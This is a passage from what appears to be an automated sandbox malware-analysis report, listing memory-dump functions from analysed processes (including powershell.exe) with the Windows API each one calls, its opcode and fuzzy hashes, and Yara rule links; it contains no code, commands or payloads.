                                                    • Instruction Fuzzy Hash: E5017879904344DFEB20EF15D885B66FBA4EF00664F08C4AADD09CF686D374E508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 2c431d4ebf6ea6894eed13b44fbc401fe793a50216afc252d01a21717f989edc
                                                    • Instruction ID: 2e87986bd6ad20afaeb7861eb059ed740d269c141cfbdd0ac621ad7a2a84384b
                                                    • Opcode Fuzzy Hash: 2c431d4ebf6ea6894eed13b44fbc401fe793a50216afc252d01a21717f989edc
                                                    • Instruction Fuzzy Hash: 6801FF79600744CFEB20DF15DC85761FBA0EF41624F08C0AADD0A8B752D374E808CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0211ABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: eaecc0317d10b0b5a11477ec2eb265a858a418fef4d4f9f49b57d14dc95e36fa
                                                    • Instruction ID: ca6b99b8a9c660e4b709f7c071104f222a864eaef5f9c7aa30d22ccb1d634835
                                                    • Opcode Fuzzy Hash: eaecc0317d10b0b5a11477ec2eb265a858a418fef4d4f9f49b57d14dc95e36fa
                                                    • Instruction Fuzzy Hash: 6E01DC31445780CFEB20DF15D889BA1FFA4EF01220F48C0AACD098F242D379A504CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02881116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: a49c77ed52e8113dd8e3e3d1991aa0dcceac8c848a31dfeb6a17a7ddb5631ffa
                                                    • Instruction ID: 63555fd258e626bb2ccef38e1e5705f6026111bf7e1545020f67a2fb550cb45c
                                                    • Opcode Fuzzy Hash: a49c77ed52e8113dd8e3e3d1991aa0dcceac8c848a31dfeb6a17a7ddb5631ffa
                                                    • Instruction Fuzzy Hash: 53F0FF3C500744DFEB20DF05D889771FBA0EF01A21F08C09ACD0D8B712CA79A444CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 789b3728cff493af7628b0da351b46cb30f015e9ec99b0477702fe7cb4cf5889
                                                    • Instruction ID: c9ecf1706dd473511321c3cd5489abd57e6a31cd0a07f137e2892ca715284d98
                                                    • Opcode Fuzzy Hash: 789b3728cff493af7628b0da351b46cb30f015e9ec99b0477702fe7cb4cf5889
                                                    • Instruction Fuzzy Hash: C8F0CD35915740DFEB20DF06D889766FFA0EF05721F08C0AADD094B352D379E908DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2136491513.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 80c008f5dfaee97306d1461d5c36144215b628c150a1f106021a5b53be1961ef
                                                    • Instruction ID: 9e34a415552ba864ce751e9c0fc49089a89fa533f1a3c61f151a9350bd41bf66
                                                    • Opcode Fuzzy Hash: 80c008f5dfaee97306d1461d5c36144215b628c150a1f106021a5b53be1961ef
                                                    • Instruction Fuzzy Hash: B2F0C239504744DFEB20EF05DC85765FBA0EF15726F08C09ADD498B356D375A508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0211AA71
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 9daec230b93e34d7142ed8e706a928cf24db4b52d52be628f12fc8e0b4417c67
                                                    • Instruction ID: f91c1d11cf15537496075c6481fcf0cd8a1b28ba48a97049a6982590eab273dc
                                                    • Opcode Fuzzy Hash: 9daec230b93e34d7142ed8e706a928cf24db4b52d52be628f12fc8e0b4417c67
                                                    • Instruction Fuzzy Hash: 24F0CD35541B40CFEB10CF05E989761FFA0EF45621F48C0AADD094B282E378A504CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0211A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: e164c899b313c29bbda6f213a820232a49d9772b416d6016456ee1823fbe570b
                                                    • Instruction ID: 00e06016a121d74e003a5ad84d2b34d5c4f0a9c17d0edebbb686ad967f24bee9
                                                    • Opcode Fuzzy Hash: e164c899b313c29bbda6f213a820232a49d9772b416d6016456ee1823fbe570b
                                                    • Instruction Fuzzy Hash: 8B11A3715493C09FD712CF25DD45B92FFA4DF42220F0984EBED498B292D275A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0211A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0211A9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134427502.000000000211A000.00000040.00000001.sdmp, Offset: 0211A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 0bd56a2789adc0ec21a2dfae03c798fd591fac3f2d156a4db913878e972d042c
                                                    • Instruction ID: e310c9c3dad8d2c1da743e24c4e6e46fad48a4c2554c54b1ef430ea36156cf33
                                                    • Opcode Fuzzy Hash: 0bd56a2789adc0ec21a2dfae03c798fd591fac3f2d156a4db913878e972d042c
                                                    • Instruction Fuzzy Hash: 4701DF71541740CFEB10DF15D9857A6FFA4DF00220F08C4BADD098B246D375A844CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021123F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134414581.0000000002112000.00000040.00000001.sdmp, Offset: 02112000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2b2751689349f1429998da03d013978cca233ec1deed0d0c8c6338204b28db7
                                                    • Instruction ID: 2f4c314fc347ad568de5deee2e19cf997bca4fb00c3b95d3c8c35793402f8b20
                                                    • Opcode Fuzzy Hash: d2b2751689349f1429998da03d013978cca233ec1deed0d0c8c6338204b28db7
                                                    • Instruction Fuzzy Hash: EDD05E79344A918FD7168A1CC1A5B9537D4AF55B08F5644F9EC40CBAA3C778F581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 021123BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2134414581.0000000002112000.00000040.00000001.sdmp, Offset: 02112000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7c430ad72d89987749dc404ace0c3f6cab6d7506cd6fbb366a4bd11429ece4a
                                                    • Instruction ID: 7ebffe218e70ea10c42df2764fadddfe6e5513ac128bb29d249085bda7616f25
                                                    • Opcode Fuzzy Hash: b7c430ad72d89987749dc404ace0c3f6cab6d7506cd6fbb366a4bd11429ece4a
                                                    • Instruction Fuzzy Hash: DED05E343506918FDB15CA1CC194F5A73E4AF44704F0644F8BC008B266C3B4E880D600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 3064 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01CAACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 75f0f57bb15b7024d737b6f9e2d618dedf3c969a4c982228c4a5d33a0dc9bbcd
                                                    • Instruction ID: e3322d67656be47d3c5c6148ebed9dcc4054fcb028012fb0380a516a740075f4
                                                    • Opcode Fuzzy Hash: 75f0f57bb15b7024d737b6f9e2d618dedf3c969a4c982228c4a5d33a0dc9bbcd
                                                    • Instruction Fuzzy Hash: 0A21A1765097849FEB238F25DC44B92BFB4EF06314F0884DAE9858F563D271D908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: ed907ea17d85ed7d8489b8e2e33be120fd6f63a4150fc7fbb8bf2f5169392342
                                                    • Instruction ID: 1c8e39a479cf9c8d6b24fcd1c4518e186b9713a71c56ea2a33b540dc1ec54c17
                                                    • Opcode Fuzzy Hash: ed907ea17d85ed7d8489b8e2e33be120fd6f63a4150fc7fbb8bf2f5169392342
                                                    • Instruction Fuzzy Hash: 8011A075900701DFEB22CF55D884B96FBE4EF04321F08C46AED898B622D331E514CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 7b7cb3c09b9d7fb6486fe889dab9a14da1335244a4777addc453824847052521
                                                    • Instruction ID: c97393fadd00d7c6a25c61d806607d38b6bec20ed7fdce6a29712e48af37f6f8
                                                    • Opcode Fuzzy Hash: 7b7cb3c09b9d7fb6486fe889dab9a14da1335244a4777addc453824847052521
                                                    • Instruction Fuzzy Hash: 0D11A071509380AFDB228F15DC45F62FFB4EF06624F09849AED844B663C275A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 9dbc04816a0fa2e78880ddd0d71b106edb324aeee770783a292ef2a7781b69ca
                                                    • Instruction ID: 3d42898b08e97b675b8fce25ff1d7dfe589e7270184676577d52c940f45f4f6a
                                                    • Opcode Fuzzy Hash: 9dbc04816a0fa2e78880ddd0d71b106edb324aeee770783a292ef2a7781b69ca
                                                    • Instruction Fuzzy Hash: C101AD35401700DFEB229F49D885B66FFA0EF04B25F48C09ADD490B612C671E918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA1A8, Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 13a5163929b332a541ae9806a911937de49094962db92c45e9c57d8d39ebc3c6
                                                    • Instruction ID: edb755ef2f756e2681e03553750f6c610a644d920ae2e550d7d52c6e1d16b243
                                                    • Opcode Fuzzy Hash: 13a5163929b332a541ae9806a911937de49094962db92c45e9c57d8d39ebc3c6
                                                    • Instruction Fuzzy Hash: D741B2714093C0AFD7138B25DC45B56FFB4EF46620F0985DBED888B193D235A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 96bd426166ee4b94f354c3239e0a6ba6b8f90eecadcd09d0bba02c2cc989d702
                                                    • Instruction ID: 3e6e0314316c12c681f9c15ac46dd82290051c7d9d95e8dfcf8000a5618abba7
                                                    • Opcode Fuzzy Hash: 96bd426166ee4b94f354c3239e0a6ba6b8f90eecadcd09d0bba02c2cc989d702
                                                    • Instruction Fuzzy Hash: FF31376650E3C48FE7138B759C65692BFB4AF43210F0E84DBD984CF1A3D6299809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 616b4e85555ed262c96e5b62dca0a8e880ebdb49191871db26fbda8a789d68f6
                                                    • Instruction ID: b4e6c24fca83a0b8953f47cd35bef3be22938a3d4884c96b1c91c7334e68f09d
                                                    • Opcode Fuzzy Hash: 616b4e85555ed262c96e5b62dca0a8e880ebdb49191871db26fbda8a789d68f6
                                                    • Instruction Fuzzy Hash: 19317275505344AFE722CF65CC45F56BFF8EF05210F09849EE988CB292D325A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 51f42e8416939546833ef41e7192b71e7190748121814ea2e6c1c80bef330ba5
                                                    • Instruction ID: c3c2d2b39241af160e04c611d9cb3d9b8b4614f6980854e6bb4a7ae941f2c500
                                                    • Opcode Fuzzy Hash: 51f42e8416939546833ef41e7192b71e7190748121814ea2e6c1c80bef330ba5
                                                    • Instruction Fuzzy Hash: 82310875509384AFE312CB25CC41B96BFE8DF06310F0884AAE948CF293D335A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: a264b595acc961359e404c5be2e2c05500847caa76d91ab54a0d4bef67f5a509
                                                    • Instruction ID: 6e2173ad26fd7ea78e2d7277260b8169ff15959b75f7adfd1bdc3655aab398b1
                                                    • Opcode Fuzzy Hash: a264b595acc961359e404c5be2e2c05500847caa76d91ab54a0d4bef67f5a509
                                                    • Instruction Fuzzy Hash: 6E318172509380AFE722CB61DC55F96BFB8EF06210F08859BF985DB193D225A908C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 2553c48a68d919e452106ea569409f76cb347433072262a718361771874f11d8
                                                    • Instruction ID: ca9b30a991a800d9369752e32e36f61d86e0b7c22758f6a20a0f8d71a5555c92
                                                    • Opcode Fuzzy Hash: 2553c48a68d919e452106ea569409f76cb347433072262a718361771874f11d8
                                                    • Instruction Fuzzy Hash: B321D2B2509380AFE7138F20DC45B96BFB8EF06320F0884DAE984DB193C225A949C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 27fd6c8c1f84584ed2aacd62ea6a0cfbd8dcff5e04c6afca5a194b7fd80af70a
                                                    • Instruction ID: 8da4155a039c42d524d45116325b84d2371d2bef9ef288d56a6405ba80282c6f
                                                    • Opcode Fuzzy Hash: 27fd6c8c1f84584ed2aacd62ea6a0cfbd8dcff5e04c6afca5a194b7fd80af70a
                                                    • Instruction Fuzzy Hash: 70316F7550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: c1e474d1cc26a4b931969c7da331aa741968cd6800b4473cc1b17a9aaa759c77
                                                    • Instruction ID: 6723ebaebb181439a5f6075bea78ba92adca6fef4a0b851da2488fb9f985137e
                                                    • Opcode Fuzzy Hash: c1e474d1cc26a4b931969c7da331aa741968cd6800b4473cc1b17a9aaa759c77
                                                    • Instruction Fuzzy Hash: D921D3B1509380EFE722CF25CC44FA6BFB8EF02220F08849AF945DB152D664E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 02840819
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: e3dd3fb47b0f6b5b4dbaca83b7632ca15c8049b909de6425696a4dc03064b573
                                                    • Instruction ID: 808b467a7576d3665b2969875f8b2a5a37441b394ff3af95ed628bda9eb0d115
                                                    • Opcode Fuzzy Hash: e3dd3fb47b0f6b5b4dbaca83b7632ca15c8049b909de6425696a4dc03064b573
                                                    • Instruction Fuzzy Hash: 6E21C876408784AFE712CB159C45FA3BFA8EF46720F0981DAF9849F193D624A905C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 8946b0a441cd223e555a4b56251c9c4f3713d3f430b18919f1abb4702fd0fcc9
                                                    • Instruction ID: 0ff0465e716d2d2bb42b01f6d119886f7eae64242a3ad9ef1c48ff6a8521d37e
                                                    • Opcode Fuzzy Hash: 8946b0a441cd223e555a4b56251c9c4f3713d3f430b18919f1abb4702fd0fcc9
                                                    • Instruction Fuzzy Hash: CB21AF7540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F6A3D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 6b0bf1f95b67dadd3b755bf45db06e5d6af73774b9c30f23daef9f4f7b9e6674
                                                    • Instruction ID: cbebf79c20d3c970746766adf6fc5d952cbc0a451262fc570b2bf0eac9b84459
                                                    • Opcode Fuzzy Hash: 6b0bf1f95b67dadd3b755bf45db06e5d6af73774b9c30f23daef9f4f7b9e6674
                                                    • Instruction Fuzzy Hash: 5C21A175500304EFE721DF65CC85F66FBE8EF08610F04846AE949CB292D731E904CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 028408E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 89edaf564430ae9cd10d011c35d686905f46b215b589b33fe8c0865b65e8a486
                                                    • Instruction ID: c1215738c958299d0aadbd08ff0a52c6fd7b3c0227747562aad2ec16dcbb4d67
                                                    • Opcode Fuzzy Hash: 89edaf564430ae9cd10d011c35d686905f46b215b589b33fe8c0865b65e8a486
                                                    • Instruction Fuzzy Hash: FE219275409380AFE722CF51DC45F96FFB8EF46314F09849BE9449B153C265A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: bda763b6a283a6da73103c9d4394dc5e8471bef936b52618e0af28a771db75d4
                                                    • Instruction ID: d3349bbe4831a2dd4ba89d285a4309fe82e22f415dde45444924d9c5f5a82772
                                                    • Opcode Fuzzy Hash: bda763b6a283a6da73103c9d4394dc5e8471bef936b52618e0af28a771db75d4
                                                    • Instruction Fuzzy Hash: C821A77540D780AFD3138B25DC51B62BFB4EF87B20F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 9d6167e63fe780a7bfa64094134feb72b331a3997c404dd2829c32359f655116
                                                    • Instruction ID: c956653f03063e5c8ee406d4f891529b514a244cac13f714049d3242e2825296
                                                    • Opcode Fuzzy Hash: 9d6167e63fe780a7bfa64094134feb72b331a3997c404dd2829c32359f655116
                                                    • Instruction Fuzzy Hash: EC21A175504308AFF724DF25DC85BA7FBD8EF04614F04856AE948DB282D775F904CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: ce74919be18fa07cb0cb8e03fa211455dfd52b55ceaf9b97b842d6ed99c77a7a
                                                    • Instruction ID: e7714e3aa1e4475d8a946a012e19ab54a427c4dffb1ba60f54fb901fb39dc8bc
                                                    • Opcode Fuzzy Hash: ce74919be18fa07cb0cb8e03fa211455dfd52b55ceaf9b97b842d6ed99c77a7a
                                                    • Instruction Fuzzy Hash: 51119D72500304EFEB22DF55DC85FAAFBA8EF04724F04856AFA459A241D670E9048BB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 33847fa5370703b2a26dd30d210ba2cfab6c880d41eca8e4fac751d96d3d5b5b
                                                    • Instruction ID: bdfbe7dcd9c884ad7ee8085bcd5e81472febd541601fa8aae4761e4af4f90ddc
